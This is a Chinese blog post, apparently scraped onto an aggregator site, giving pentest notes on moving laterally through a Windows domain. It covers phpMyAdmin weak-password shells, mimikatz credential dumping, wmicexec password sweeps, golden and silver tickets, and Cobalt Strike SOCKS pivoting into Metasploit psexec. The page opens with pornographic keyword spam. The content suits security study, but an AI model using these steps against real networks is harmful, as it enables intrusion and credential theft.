日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内网渗透-域内有网和无网

發布時間:2024/6/3 编程问答 46 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内网渗透-域内有网和无网 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

  • 前言
  • 域內主機有網
    • 攻擊流程
  • 域內主機無網
    • 操作流程

前言

在滲透測試的過程中,拿下域內一臺主機以后,有時候內網的其他主機有網,有時候沒網,此時,如果有網我們就按常規的滲透測試即可,如果沒網我們就應該以該主機作為跳板,使用socks協議或其他辦法,從而實現與無網的主機進行通信

域內主機有網

攻擊流程

通過域環境webserver主機的外網WEB服務開啟到域控權限的獲取
假如已經獲取webserver權限:
0x01:

  • 通過phpmyadmin弱口令getshell

0x02:

  • msf生成 msf監聽 getsystem upload ‘/root/x64’ c:\test mimikatz
    privilege::debug sekurlsa::logonpasswords

0x03:

  • 批處理wmicexec測試弱口令 29 31 32 IP存在

0x04:

  • 獲取29 31 32權限 反彈msf getsystem

0x05

  • 批處理wmicexec測試弱口令 21中標
  • execute -f cmd.exe -H -i 0x06
  • 導出所有hash 進行黃金白銀票據

域內主機無網


Msf

  • 拿下weserver,發現有兩個網段,192.168.3.31 192.168.230.131
    假設192.168.230.131為外網,192.168.3.31為內網
  • 又發現內網其他主機都沒有聯網,只有webserver聯網了。
  • 此時,可以用webserver作為跳板,用cs開啟socks,并用msf

操作流程

#cobalt strike

  • 啟動,監聽,生成,上線,提權
  • cs啟動sockt4 生成監聽端口跳板,將setg Proxies
  • socks4:192.168.230.133:xxxxx復制到msf

msfconsole

  • 加載代理:setg Proxies socks4:192.168.230.133:xxxxx
  • 攻擊模塊:ms17010 ms14068 smb psexec等
  • use exploit/windows/smb/psexec

#自己綁定自己,就實現了無網探針

  • set payload bind_tcp
  • set smbuser administrator
  • set smbpass admin!@#45
  • 上傳mimikatz:upload ‘/root/x64’ c:\test
  • mimikatz privilege::debug sekurlsa::logonpasswords

總結

以上是生活随笔為你收集整理的内网渗透-域内有网和无网的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。